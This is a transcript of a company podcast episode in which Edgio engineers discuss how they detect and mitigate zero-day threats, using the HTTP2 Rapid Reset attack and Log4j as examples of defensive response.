An Introduction to Edgio’s Beyond the Edge Podcast Episode 5: Identifying and Mitigating Zero-Day Threats hosted by Andrew Johnson, Sr. Product Marketing Manager – Security at Edgio.
Andrew Johnson: Welcome to Beyond the Edge, where we dig into the ins and outs of the trends affecting modern digital businesses. I’m Andrew Johnson, your co-pilot for this episode. And today we’re exploring the topic of zero-day threats, specifically how we identify and mitigate them. Joining us today are Dave Andrews Edgio’s, VP of Engineering, and Marcel Flores, lead research scientist at Edgio.
Welcome, Dave. And Marcel, it’s great to have both of you here. Can you tell us a little bit about yourselves and your roles here at Edgio?
Dave Andrews: Sure. Thanks for having us Andrew. It’s a pleasure to be on. So I am VP of Engineering. I’ve been at Edgio for I think just a shade over 11 years. And I’m responsible for the edge platforms and a lot of the kind of central infrastructure from an engineering perspective.
Andrew Johnson: Awesome. Thank you.
Marcel Flores: Yeah. Thanks so much for having us. As you said, I’m Marcel Flores. I’m the lead research scientist at Edgio Labs, the research group here at Edgio. My team works on improving the performance, reliability, and operations of the network by performing rigorous research and development, as well as engaging with the broader systems and networking research community.
What is a Zero-Day?
Andrew Johnson: Awesome. Thanks again for joining us today, guys. So the topic of zero-day threats, I think it’s important to quickly give our audience a background on what zero-day vulnerabilities and attacks are. I’ll briefly try to cover that before we get into some of your experiences protecting Edgio and our customers. So what a zero-day is in terms of what we’re talking about here? Well, basically modern apps, modern businesses, modern services are made up of software, software from open-source code, commercialized code bases different protocols, etc. We know that no software is perfect, and from time to time, vulnerabilities are going to be detected in that code. Basically, “zero day” refers to the time period within which a vulnerability is discovered and the time to either come up with a patch or a workaround, right?
So, developers, once they know about a vulnerability, they’re going to try to patch it as quickly as possible or give customers and users of that software steps they can do to prevent the exploit. But basically, like I mentioned, it’s a problem that isn’t going away. We see the number of CVEs or common vulnerabilities and exposures increasing every year by about 25% increase in 2022 compared to 2021. It’s not super surprising that more vulnerabilities are going to get spotted. There are AI tools that can scan code bases quickly. There are certainly financial incentives for both good actors and bad actors to find these vulnerabilities on the good, the good actor side. There are bug bounty programs.
You’re familiar with when Apple pushes out code fixes for your iPhone all the time. Good white hat researchers are submitting exploits to these developers, and then there are bad actors that are also exploiting vulnerabilities as well. So, just a little bit of background on that. Maybe some common ones you’ve heard of recently. HTTP2/Rapid Reset was a big very notable thing in the application security world recently. Maybe you’ve heard of Log4j, Spring4Shell, or a few years back, the Apache Struts 2 vulnerability that caused massive data breaches here in the United States, actually around the world. So that’s just a little bit of background on zero-day threats, but yeah, maybe I’ll go ahead and start by asking Dave just a little bit about what you guys do to protect Edgio and our customers from zero-day threats.
How Does Edgio Protect Itself and Its Customers from Zero-Day Threats?
Dave Andrews: Yeah, absolutely. So security I think is all about defense in depth, right? Like, there’s never any one particular thing that you do. It’s more about making sure that you have a number of layers all strung together. The idea being if one or two layers are imperfect, as they all are because we have very intelligent humans actively trying to break them, the sheer number of layers and with overlapping protections and mitigations is designed, you know, the, the whole point here is to, it doesn’t matter if one thing fails because there’s five other things sitting there that will protect you. So, taking a step back, like the first, and I think arguably one of the most important things is just generally falls into the bucket of preparedness.
There are at least three separate aspects to that. The first one that springs to mind for me is, is hygiene. Having good security hygiene is absolutely critical. And it really helps largely by reducing your area of concern. So what do I mean by hygiene? There are two primary things. One is keeping software up to date, or regular patching. This is the most boring thing in the world. It’s also arguably one of the best, most critical lines of defense. It means you take advantage of all of the responsible disclosures that you were talking about, Andrew, the good, white hat researchers, finding vulnerabilities, disclosing them to vendors, fixing them, and rolling out fixes.
You get to take advantage of all of the basically known attack vectors in the software that you’re using. Just because it’s boring does not necessarily mean that it’s easy especially when you’re working at the scale that we are at Edgio, as well as a number of other places, it’s very, very difficult to manage the risk that comes with upgrading all of your software on a regular basis. So, as we’ll see later on there’s a lot of things that we do operationally to make that safer and easier to do. But it still falls pretty squarely into the hygiene bucket, if you will. The next piece that lands within hygiene is scanning. Which the whole point here is actively looking for things that are indications that you’ve got an issue before a bad actor finds it.
So this takes a number of forms. It can be internal security teams or information security teams. You can hire external parties to perform scans. It can be both. Often the organizations leverage bug bounty to basically encourage people to take the white hat route, find vulnerabilities disclose them to us or to the particular party so that they can be fixed before they’re actively exploited. So those things fall into this bucket of anything that you can fix, fix that first, right? Like, take advantage of the good work that the entire community is doing to make the internet and software in general more secure. And then actively looking at your own applications, trying to find vulnerabilities and proactively fix them as best you’re able. The next section I would say around preparedness, I’m going to turn over to Marcel, is observability.
Marcel Flores: Yeah, thanks Dave. So I think another important thing to be able to do in a lot of these cases is to be able to see what’s going on your network or with your infrastructure. So I think this kind of falls into to two categories that are fundamentally approached the same, but I think are important to call out. The first is to sort of think about application-level behaviors, right? Making sure that you understand what requests are coming into your network and sort of what the features are of those requests, how they’re shaped and what they look like normally and what they might look like during certain events. I think it’s also important, to keep in mind that whenever you’re communicating on the internet, right, it’s a sort of full stack operation, right?
Where each request is going to pass through both the application layer, but also the lower level protocols. And so it’s important to keep an eye on what’s going on further down the stack, right? And understand that there may be complex behaviors and responses from lower layer level systems that aren’t well captured in those application layer behaviors. So it’s important to keep track of sort of both components of that and to have observability into what’s going on in both cases. And I think a key piece is being able to understand when that traffic changes, right? When your traffic defies expectations, right? You might start seeing features of application requests that aren’t what you normally see, right? For example, a sudden increase in HTTP posts as opposed to gets, thinking about the application layer, thinking about the protocol level, right?
This may be something very intricate in the protocol like HTTP2 or something even lower. And thinking about what’s happening to the TCP sockets and what’s going on with the protocol interactions at that level, especially when you’re thinking about things like DDoS attacks that might try and exploit particular vulnerabilities. I think key to having these vulnerabilities, to this observability is not only having metrics that allow you to see what’s going on, but also have the ability to sort of dig into these behaviors, right? And to segment them accordingly, right? To understand if there’s a particular user population that’s generating a certain set of traffic. There are specific networks, it’s specific customers, specific property of a certain customer, right? So you can understand and narrow down where things are actually happening and how they might be happening.
Andrew Johnson: That’s interesting. That’s interesting. So what, after you observe these different types of behavior or something you think might be a zero-day, what are some of the steps operationally that you can take?
What Steps Can You Take to Mitigate Zero-Day Threats?
Dave Andrews: Yeah, I can take that one, Andrew. Yeah. The two kinds of elements that Marcel was talking about are really the foundations, right? Like the first one is looking at things, looking at trend, which boils down to from one perspective, looking at things in aggregate, right? Like, what does this look like overall? And the whole point there is you get a high-level view of what’s going on, and it lets you identify changes very, very quickly, as you said. The second part in terms of deep diving is actually being able to tease out and develop your understanding about what change, what level is it operating at, and is it a risk, right? Like, you know, the internet is the wild, wild west, right? Like, things change all the time.
New behaviors are happening all the time. Not all of those things are a security issue, right? Like, so the ability to have a much broader aggregated set of information but lets you dig in and ask and observe or rather answer questions that are much more nuanced, lets you get to the heart of what has changed and why, and lets you make that decision. Like, oh my goodness, like, this is fine. It’s a new customer doing something. Or you know this is actually an issue, or we need to go look. So stepping away from, you know, seeing what has happened, and developing some understanding about it’s an issue. You get into the realm of like, great, then what?
Like, what do you do about it? And this bucket of what we call operational agility and agility. There’s a few high-level themes that we think through when we consider operational agility. Again, three but those are responsiveness, safety, and redundancy. So just spending a little bit of time on each of those responsiveness is exactly what it sounds like, right? When something is going wrong from a security perspective time is of the essence, right? Like you know, you want to be able to close security issues very, very quickly to give the attackers minimal time to wreak havoc and give you the maximum amount of time to clean up. So what we target from a very broad sense, not only around security issues but just around all kinds of operational changes we make, we target around five seconds to reach 99.99% of the infrastructure.
That’s the goal. We don’t always get there because some things necessarily take longer, but that is the target. And a lot of our subsystems do meet that target. Safety is a weird kind of theme to think about with operation agility. So let me tease that one apart a little bit. One of the risks that you have when you’re trying to do something with a high level of responsiveness, i.e. very, very quickly, is that you could fix the problem very, very quickly, assuming that you have perfect observability and a perfect understanding of exactly what’s happening, and you can perfectly predict the response to the change that you’re about to make. That’s great, and a lot of times that’s the case. However, there’s also the chance that your understanding of any of those things is imperfect, and you may well make it worse also very, very quickly.
Nobody wants that. So the whole point about safety is that you put systems in place, and processes, and automation, and a lot of other things go into it to make sure that you don’t, in fact, make it worse. That boils down to a couple of very, very high-level things. At the start. It’s like proactive modeling. This applies really heavily to basic capacity planning, right? For example, if you have to take machines out of production for some reason to patch them because it requires services to be restarted for whatever reason. One of the risks there if you try to do that very, very quickly is you take too many machines out of production for the load that they’re currently experiencing. You can know that ahead of time, right?
So we have a lot of modeling systems that integrate with workflow systems so that when a request to patch everything as fast as you can goes, it doesn’t immediately pull all servers out of production. So there are basic safety systems that you can build and integrate to prevent yourself from shooting yourself in the foot. And so, assuming that, that we’re not going to make things worse from that perspective, just on a pure capacity planning infrastructure perspective, we also want to know that the change that we’re making has the intended effect at the application level or at the whatever level, observability application, protocol, whatever it is that we’re trying to mitigate. So what we do that we leverage a system that we call coal mine. We’ve blogged about it and spoken about it publicly before, but the idea there is basically everything goes out as what we call a canary – canaries in the coal mine.
The point there is nothing happens globally all at once, no matter how dire it is. A minimum two phases for something to go out. So we put it on a subset of infrastructure. Typically the infrastructure that is experiencing the event most egregiously or is most visible, we validate that it does what we expect, and then we very quickly roll it out later on. Sorry, roll, roll it out more broadly and validate that the overall problem resolves at a global level. So coal mine and canaries tightly integrated with their metrics and observability systems so that you can correlate at a glance like, what is this? What is this canary doing to the aggregated metrics that I’m looking at? So we get real-time feedback that, hey, the change we’re making is in fact addressing the problem.
So that’s very, very handy. What we’re actually working on at the moment and getting ready to launch internally and later on, we’ll productize this for customers and their configuration changes, is basically fully automated metric analysis. So currently when we make a change like this, it requires a human to sit there and look at it, make sure that the correct thing is happening, and make sure that the metrics that they’re concerned about are moving in the right direction. And then basically advance the canary, tell the system like, great, you’ve passed the first phase. Everything looks good. Go ahead and go to the global phase of that canary. We do this, we leverage the system for all changes, not just, you know security operational changes, but all changes that flow throughout the system.
And what we’re bumping into is as we build more and more visibility to our sales point, more and more visibility, more and more metrics, more and more information about what’s happening there’s more and more for the humans to look at, right? And that load is reaching the point where it is too high. And so humans are starting to make mistakes, right? Because there’s simply too many charts to look at, too many graphs to look at and people get tired and people are imperfect anyway. So we’re launching a system called Birdwatcher, the thing that watches the canaries basically that does some sophisticated statistical analysis on the metrics, like as the changes are rolling out and gives it a thumb up or a thumbs down. And that’s integrated with coal mine so that we can say, Hey, in an automated way, we get some indication that that canary is good, it’s doing what we expect.
And also separately it’s not doing anything bad that we don’t expect, and that, that rollout will proceed without any human intervention. So super excited about that. That’s going to make our responsiveness even faster and even safer. So those are the main things that we consider when we’re talking about safety, being able to quickly and safely make the problem go away. The final point that I mentioned was redundancy, which is relatively self-explanatory. There’s a key point or philosophy that we leverage and deploy which is basically dual path for a lot of these changes, as many as we can muster. So what dual path means, the two paths that we think through are basically fast, best effort and slow, reliable. The idea there being, we operate a large amount of infrastructure in very, very, disparate places all around the world.
The ability to hit everything with a hundred percent reliability in a few seconds is a fairytale. Like, that’s not something that is feasibly possible. Something somewhere is always kind of having an issue. And there’s not really anything you can do about it. So what we do is we basically layer these things together similar to security, to defense in depth, right? Like, you put these two things together and, and what this actually looks like is leveraging the fast path. Go hit as much as you possibly can. And then anything that you miss, we make sure we have a redundant reliable path that we’ll keep retrying until it works, that is a little bit slower. So to put some numbers to that, the fast path will touch we’ll make a change on approximately 99.9% of our infrastructure in sub-five seconds, right?
Like, and that 99.9% is repeatable and reliable. And then the slow reliable path runs on the order of 60 seconds. And that system will keep trying until it succeeds basically. So we, by leveraging these two together, we get the best of both worlds. And if one of those subsystems completely goes down, it doesn’t mean that everything is down, we’ll still where we need to be maximum five minutes later. So those two things together give us this responsiveness and agility with the reliability that we’re looking for. There are other like, fun little things to make sure that we have some redundancies. Like how do you kick these systems off? Like a lot of systems have you know, chatbots integrated, so it’s very, very easy.
Anyone can do it from anywhere in the world on their phone. A lot of other things have APIs. There’s a CLI for a lot of the subsystems. So making sure that there’s not just one way to kick these tasks off is another example of how we try to build in redundancy so that we can always have that operational agility at our fingertips irrespective of what’s happening or what particular system might be experiencing an issue. We make sure that we have control and the operational ability that we need. A lot of these things, you know, are all general purpose, but like I said, we leverage them for as much as we possibly can. Everything from our own infrastructure workflows, like taking a machine out of production and patching it all the way through to customer configuration changes. It all leverages the same core system that we dog food and leverage ourselves aggressively. So the product that we expose to our customers it’s reliable and very, very solid.
Andrew Johnson: Awesome. Awesome. Appreciate that Dave. And Marcel, I think you talked about best practices or considerations that security teams can apply to their practice. Appreciate those tips. I know you guys have definitely dealt with some really interesting zero-day examples in the wild to protect Edgio and our customers. I’m sure you have some good stories and applications of these best practices. Would you be able to talk a little bit about that?
Zero-Day Examples: HTTP2/Rapid Reset
Dave Andrews: Yeah, absolutely. I think the one that’s most pertinent or most recent, I guess, and it was kind of interesting is, you mentioned it earlier, is the HTTP2/Rapid Reset attack. That was a very interesting experience. So just to relay it from Edgio’s perspective, there’s a little blog that we wrote up on this guy as it happened. HTTP2/Rapid Reset was a zero-day attack where people realized that the not only the implementation of mode HTTP2 server libraries had taken kind of something in the HTTP2 RFC, the specification, the protocol specification as a general recommendation and basically codified that in the libraries themselves. And that was the number of concurrent requests that were allowed to be, sorry, the concurrent streams that were allowed to be in flight on a particular connection, which was in the spec, written as being a hundred.
That coupled with an interesting little facet of H2, which is, you know, the idea being the multiplex – lots and lots of requests on a single TCP socket – and the ability to cancel requests led to this very, very interesting vulnerability or DDoS vulnerability. The whole point there what the attackers are looking for is something that costs a small amount for the attacker and costs more for the attackee, for the person on the other end. And they found it in HTTP2 rapid reset. What that basically meant was the attacker could very, very, very quickly cram into like a single packet initiating a request and then canceling it over and over and over, like hundreds of those on a single socket sorry, on a single packet and send it to the server.
The server then has to do a lot more work than just sending a single packet. We have to create a request, oftentimes we have to initiate a proxy connection. That’s what CDNs do to go and fetch whatever asset the attacker was requesting. And then finally we have to log that the request happened. So the fact that the attackers were able to generate those initiations and cancellation of the requests is very, very quickly. Basically most, like anyone who came under that attack, it’s more expensive. It was more expensive to process them than it was to generate them. And so that, that becomes a DDoS vulnerability. So we like lots of other folks in the industry ran, you know, were attacked by that.
And everyone was attacked at around the same time, which made it particularly interesting. It was a very broad attack. And I would love to understand what the attackers were thinking when they started that. Because they were attacking many, many, many providers all at the same time. Which we discovered when we started talking to the other providers and be like, oh, when did you see this? Oh, that’s exactly the same time that we saw it, which we stumbled into because we found the attack. We identified what was happening because of the observability that Marcel’s talking about. And we started building mitigations, right? So that mitigation looks like adding even more observability to get at the heart of exactly what was happening and then building operational controls that let us tweak a response to it.
So what that actually looked like was like, keep track of how many times any client is resetting requests on a particular socket, and if the percentage there goes above a predefined threshold, terminate that connection. So the idea is basically to not allow the attacker to continually send these requests to put a cap on it and hence be able to mitigate the attack. So we published that blog after we’d built that mitigation, deployed it, enacted it, and validated that it was in fact preventing those attacks from recurring. Then we had folks from the industry reach out and like, oh, we saw the blog. We were actually also impacted by that and we’re working on responsible disclosure. So we folded in with a group from the industry worked with like Vince, which is a part of the cert to go through the responsible disclosure flow, make sure that in this case the folks who were implementing HTTP2 libraries or HPD servers had time to generate patches, deploy those patches before the, the vulnerability was more widely publicized.
So it was a very, very interesting, interesting flow. We were able to, to turn that around very quickly, right? Like in part because of the work that we do on hygiene and operation and operational visibility and agility, we were able to kind of have a very small change to make, right? Like, it wasn’t, you know, oh my goodness, we have to upgrade this library and we’re like 10 versions behind because we don’t regularly update it. It wasn’t that it was like, actually we’re, we’re one version behind, right? Like, because we regularly patch upgrade that the risk is reduced because it’s a small hop, which means you can do it very quickly whilst maintaining that low-risk threshold that we have. So we did that very, very quickly and we’re able to roll it out and mitigate the attack. And then we put up the blog without knowing that the attack had hit more people in part to try to socialize with not only our customers, but the industry. Like, Hey, this is something weird that we saw which looks like it’s nothing specific to Edgio and in fact potentially more applicable. And it turned out that it was.
Andrew Johnson: That’s, that’s really interesting. Kind of cool to see an inside view of you know, the security community across the globe working together to, to you know, improve outcomes for everyone. Marcel, did you want to add anything around this?
Marcel Flores: Yeah, I just wanted to add a note that I, I think this, this example was a an interesting one in which the initial observability that we had definitely showed strange behaviors as Dave was sort of describing, right? This interaction of sort of lower-level protocol feature with the higher level behaviors of the CDN created some really unexpected behaviors. And part of that, part of figuring out what was going on here was understanding that there was this severe imbalance, right? That the number of requests we were seeing versus the number of requests we were actually delivering back to clients was skewed, right? And that stood out. And even though those were both metrics we had been collecting, we hadn’t been comparing them in exactly that way. So part of the outcome of this was to sit down and look at it and say, Hey, what, how can we combine the visibility we already have into something that is tailor made for detecting this issue? And we were able to do exactly that and sort of improve the scope of our visibility by looking at the data we already had through a slightly different lens.
Andrew Johnson: Awesome. Awesome. That’s good to keep in mind. And thank you for that, Marcel. Yeah, guys, so I think we’re, we’re wrapping up. If, if there’s any additional recommendations you want to share? I think we covered a high level, some very good ones.
Recommendations for Strengthening Your Security Posture
Dave Andrews: Good question. I think a general recommendation is hygiene is critically important. Focusing on your observability, I think the thing that I would call out is find people who can help, right? Like part of the value of a critical value proposition that a company like Edgio provides is we can definitely help, right? You have a whole team of people like myself and Marcel who are working on this and working on proactively preventing whole classes of attacks from impacting folks. So find people who can help, right? Like there’s a bunch of tools and technology that we build, that the community has available that can make your job easier. When we’re talking about, you know, generally things on the internet, a WAF is like, is the most critical, like the most basic also, I would argue the most critical example of something like that.
It gives you the ability if it’s implemented appropriately, it gives you the ability to combine the agility and the safety elements together. So the Edgio WAF runs in a dual mode, which means you can deploy new rules to production, to the actual machines that are getting it, that are observing the traffic. And you can see what is happening. A good example of that was with Log4j, which was, you know, going back in time a tiny little bit. When we develop the response to that, we’re able to develop the rule very, very quickly and validate it very, very quickly. Because we were pushing rule updates and able to deploy them in alert mode on the actual machines and see that they matched the attacks, show our customers that they either were not getting attacked or were getting attacked. And then make a very data-driven decision to enable that rule into blocking mode and actually prevent those attacks from making it through to our customers. So it combines all of those things together, right? Like speed of responsiveness, safety, redundancy, and reliability. Get people who can help. I think would be my key recommendation.
Andrew Johnson: That makes a lot of sense. I appreciate that, Dave. Yeah, I mean, when responding to zero days, time is critical. So having these specialized solutions, but also more importantly, the people that can help you through this is key to closing that door on attackers. So with that guys thank you very much for joining us. I’d like to thank the audience as well, and we’ll see you on the next episode. Thank you.